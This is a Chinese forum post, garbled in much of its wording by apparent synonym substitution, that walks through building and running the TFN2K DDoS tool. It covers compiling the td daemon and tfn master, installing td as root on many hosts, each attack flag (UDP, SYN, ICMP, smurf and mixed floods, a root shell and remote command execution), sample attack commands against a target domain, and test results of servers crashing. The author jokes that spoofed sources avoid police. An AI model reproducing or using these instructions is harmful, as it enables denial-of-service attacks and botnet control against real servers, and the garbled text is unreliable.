|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
vim除非你打算真正的学好linux,或者说打算长久时间学习他,而且肯花大量时间vim,否则,最好别碰
起首说我们用来打击的客户机和服务器的设置办法,利用当下最着名的REDHATLINUX举行测试,本次打击测试我利用的是FEDORACORE3,软件用的是最着名的DDOS。
空话不说了,入手下手设置服务器。
解压tar-zxvftfn2k.tgz
一.安装TFN2K
TFN2K为开放原代码的软件,以是必要我们举行编译,这个不必说了,编译应当城市的吧,但有几个中央是必须注重的,由于利用分歧版本和厂商的LINUX必要分歧的设置。
先修正src/ip.h
正文失落以下部分,不然编译堕落。/*structin_addr
{
unsignedlongints_addr;
};*/
然后make举行编译
编译时会提醒你输出服务器端举行暗码设置8-32位,(打击的时分必要输出暗码)编译后会呈现两个新的实行文件td和tfn,个中td是保卫历程,也是客户机的利用历程。而tfn是服务器把持历程,假如想打击他人就必须先起动td这个历程,然后再运转服务器历程,不然攻击有效,变动暗码能够实行mkpass举行变动。最初在一切的客户机中安装并运转td(必要ROOT权限),而且在服务器上创建一个文本文件,文件中纪录一切的客户机IP地点(用VI编纂一个便可行了),格局为:
192.168.0.1
192.168.0.2
192.168.0.3
IP
IP
……
然后在主服务器上运转./tfn
二.打击
./tfn间接回车人人能够看到一些参数,英文好的伴侣估量不必我来多讲了:)
格局./tfn<参数>
无用的参数我们不提,我们来讲打击用的
-f这个参数前面跟方才所写的文本文件名,就是真正完成DDOS打击,而不是DOS
-hDOS打击,也就是单机,一对一的打击前面跟一个主机或IP地点
-p前面指定一个端口,不必说了
-c最关头的参数,一共有11个选相
0-中断打击,发善心用的
1-反棍骗品级设定,由于TFN这个工具在打击的时分所收回的数据包是带有源地点的,可是源地点是随机的,也就是说地点不是你自给的,以是不必忧虑差人抓,哈哈
2-改编数据包的包尺寸:缺省的ICMP/8,smurf,udp打击缺省利用最小包。你能够经由过程改动每一个包的无效载荷的字节增添它的巨细。
3 - 绑定rootshell:启动一个会话服务,然后你毗连一个指定端口就能够失掉一个rootshell。
4 - UDP大水打击:这个打击是使用如许一个现实:每一个udp包被送往一个封闭的端口,如许就会有一个ICMP不成抵达的信息前往,增添了打击的才能。
5 - SYN大水打击:这个打击有纪律的送子虚的毗连哀求。了局会是方针端口回绝服务,添瞒TCP毗连表,经由过程对不存在主机的TCP/RST呼应增添打击潜力,是尺度的回绝服务打击.
6 - ICMP呼应(ping)打击:这个打击发送子虚地点的ping哀求,方针主时机回送不异巨细的呼应包。
7-SMURF打击:用方针主机的地点发送ping哀求以播送扩展,如许方针主机将失掉复兴一个多倍的复兴。
8 - MIX打击:依照1:1:1的干系瓜代的发送udp,syn,icmp包,如许就能够凑合路由器,别的包转发设备,NIDS,sniffers等,轮替轰炸:)
9 -TARGA3打击
10 - 远程命令实行,这个参数是TFN的附加功效,实在TFN的打击不单单是DOS,还能够远程的举行明令把持,如:
./tfn-fhostext-c10-i"mkdir/root/edison"在一切的HOST上root家目次创建edison,-i前面跟"命令"
参数基础说完,上面打击
./tfn-fhostext-c4-iwww.xxx.com
利用hostext文件中纪录的主机对163服务器举行UDP打击(一切的主机中必须已起动td历程)
./tfn-fhostext-c5-iwww.xxx.com-p80
利用hostext文件中纪录的主机对163服务器举行TCP回绝服务打击(80打击WEB,其他不必说了)
./tfn-fhostext-c6-iwww.xxx.com
利用hostext文件中纪录的主机对163服务器举行ICMP打击(PING打击,缓冲区溢出即刻逝世机)
./tfn-fhostext-c8-iwww.xxx.com
利用hostext文件中纪录的主机对163服务器举行ICMP&TCP&UDP轮替打击(假如对方是sniffer必定哭逝世)
./tfn-fhostext-c0
让所由主机中断打击
基础说完,最初说说我的测试了局
一对一打击,打击体例TCP毗连体例当地当地CPU13%被打击的服务器CPU利用率70%以上,并不时动摇
二对一打击,打击体例TCP毗连体例当地当地单机CPU13%被打击的服务器CPU利用率100%
五对一打击,打击体例TCP毗连体例当地当地单机CPU13%被打击的服务器逝世机.自己家里只要6台呆板,但假如再多点,几十台呆板,一样平常的团体服务器一定要逝世失落了
一对一打击,打击体例ICMP毗连体例当地当地CPU18%被打击的服务器CPU利用率96%以上,并不时动摇二对一打击,打击体例ICMP毗连体例当地当地单机CPU18%被打击的服务器以经没法上彀,几近没法利用,半小时内逝世机.看来能力不小
</p>
有些人号称用过十几种甚至几十种linux,向人谈论起来头头是到,好像懂的很多。 |
|